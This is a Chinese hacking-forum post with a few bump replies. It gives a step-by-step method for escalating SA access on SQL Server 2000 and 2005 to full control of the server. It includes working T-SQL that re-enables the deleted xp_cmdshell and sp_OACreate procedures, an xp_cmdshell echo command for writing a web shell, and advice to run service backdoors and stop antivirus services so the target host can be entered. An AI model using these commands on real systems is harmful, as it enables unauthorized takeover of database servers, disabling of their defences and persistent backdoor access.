找回密码
 注册

QQ登录

只需一步,快速开始

查看: 1636|回复: 4

[分享] SQL2000和SQL2005在SA权限拿最高权限

tianshiren 发表于 2008-11-6 19:04:03 | 显示全部楼层 |阅读模式 来自 中国山东青岛

马上注册,结交更多好友,享用更多功能。

您需要 登录 才可以下载或查看,没有帐号?注册

x
SQL 2000 / SQL 2005 数据库

  当你得到了SA权限时,有些人会说拿不了服务器的最大权限, 看来会不会是长相问题?

  分析如下:

  ConnString :

  server=IP;UID=saWD=password;database=masterrovider=SQLOLEDB

  很多时候可能会遇到删除了'sp_OACreate' 'xp_cmdshell'

  可以用下面的方法尝试恢复添加

  SQL2000:

  Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')

  Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')

  SQL2005:

  exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;

  EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

  在这里,传说中的SQL2005安全性比较高的,在SA权限下显得更加没了地位了!

  好了,添加好了这些. 此时就真的要看你的长相了..

  利用什么方法上传自己的SHELL呢? 网上的方法也一大把.

  我这里提供一个比较简单的方法:

  echo写入SEHLL

  格式如下:

  Exec master.dbo.xp_cmdshell 'echo 代码 > name.txt'

  这个可要自由发挥了...

  关于如何找路径,那些就不说了,实在是没点技术含量了.

  上传了SHELL,接下来操作就会顺利一点. 传一些服务级后门之类的.

  再次通过xp_cmdshell 运行后门.

  此时你会遇到很多问题,比如你的后门会不会被杀? 服务器安装了什么杀软? 这些都是小问题,完全可以通过相关的命令让那些阻挠你的软件去死.

  DOS命令,会吧? 直接STOP那些服务就OK了!最后运行后门,进入你的目标主机!
zwd1587 发表于 2009-2-20 10:37:28 | 显示全部楼层 来自 中国黑龙江大庆
帮顶了
回复 支持 反对

使用道具 举报

哭泣的花蕾 发表于 2009-2-20 18:39:43 | 显示全部楼层 来自 中国黑龙江鸡西
帮顶了.......
回复 支持 反对

使用道具 举报

hj520 发表于 2010-2-9 11:30:24 | 显示全部楼层 来自 中国重庆
看不懂,不过分享技术的帖子都要顶
回复 支持 反对

使用道具 举报

chenjun860525 发表于 2010-3-10 11:25:43 | 显示全部楼层 来自 中国浙江绍兴
KANBUDONG
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表